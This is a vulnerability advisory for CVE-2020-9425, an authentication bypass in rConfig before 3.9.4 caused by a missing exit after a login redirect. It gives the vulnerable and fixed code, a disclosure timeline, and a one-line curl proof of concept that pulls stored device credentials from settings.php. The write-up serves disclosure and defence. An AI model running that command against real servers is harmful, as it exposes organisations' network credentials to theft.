[CVE-2020-9425] rConfig < 3.9.4 Authentication Bypass

Table of Contents

• What is rConfig?
• Discovery
• What was the root cause of this bug?
• Proof of Concept
• Disclosure timeline

What is rConfig?

rConfig is an open source PHP web application that allows for device configuration management, it is commonly used within corporate internal networks that are looking for easy management of network connected devices.

Discovery

The discovery of this bug was very straight forward and simple, the bug should be obvious in both white and black box scenarios. I came across this bug while on an internal penetration test at work, while doing some directory bruteforcing on one host I came across an /rconfig/ folder. First impressions it seemed to be locked behind a set of admin credentials of which I did not have, so I continued to perform some more content discovery attempting to find any pages that might be accessible. After running for some time I noticed that I was receiving many 302 redirects for PHP pages with large responses, which is usually indicative of an authentication issue and may indicate we can access web application functionality. At this point I sent a request through to rconfig/settings.php through Burp Suite, intercepting the response to strip the Location header. The page loaded and I realised I had at least read access to the web application and was able to view the application configurations settings. This was extremely useful to me as I was currently in need of a set of priviliged domain credentials, and there was a set belonging to a service account convieniently sitting in plaintext in an input field in the settings page.

What was the root cause of this bug?

The core issue is within the application’s “is this user logged in” check. This code resides in includes/head.inc.php reviewing this reveals the following code.

1
2
3
4
5
6

/**
 * User has NOT logged in, so redirect to main login page
 */
if (!$session->logged_in) {
    header("Location: " . $config_basedir . "login.php");
}

This is a pretty standard login check present in many PHP applications and is standard logic, if a user is not logged in, then redirect them to the home page. This code would simply set the Location header to redirect the user. The issue resides in the lack of an exit or die function after the header function, without either of these functions present, PHP will continue to process the rest of the code and return the page contents as if the user is actually authenticated.

As expected, the fix was equally simple and includes the missing exit function after the redirect, as shown below.

1
2
3
4
5
6
7

/**
 * User has NOT logged in, so redirect to main login page
 */
if (!$session->logged_in) {
    header("Location: " . $config_basedir . "login.php");
    exit();
}

Proof of Concept

Below is a simple one-liner PoC to retrieve the stored domain credentials (if present), however the full impact of this bug is likely to be a lot higher, especially given the primary use case of the application.

1. Run the following command: curl -X GET https://target/rconfig/settings.php | grep “defaultNode”
2. Observe the values returned for the defaultNodeUsername and defaultNodePassword revealing the stored credentials.

Disclosure Timeline

The maintainer was very quick to respond and release a fix which was greatly appreciated.

• 12 February 2020 — Vendor notified
• 14 February 2020 — Vendor acknowledged
• 25 February 2020 — Vendor fix pushed to Github
• 17 March 2020 — Original advisory posted
• 22 Janauary 2022 - New advisory posted as original is no longer accessible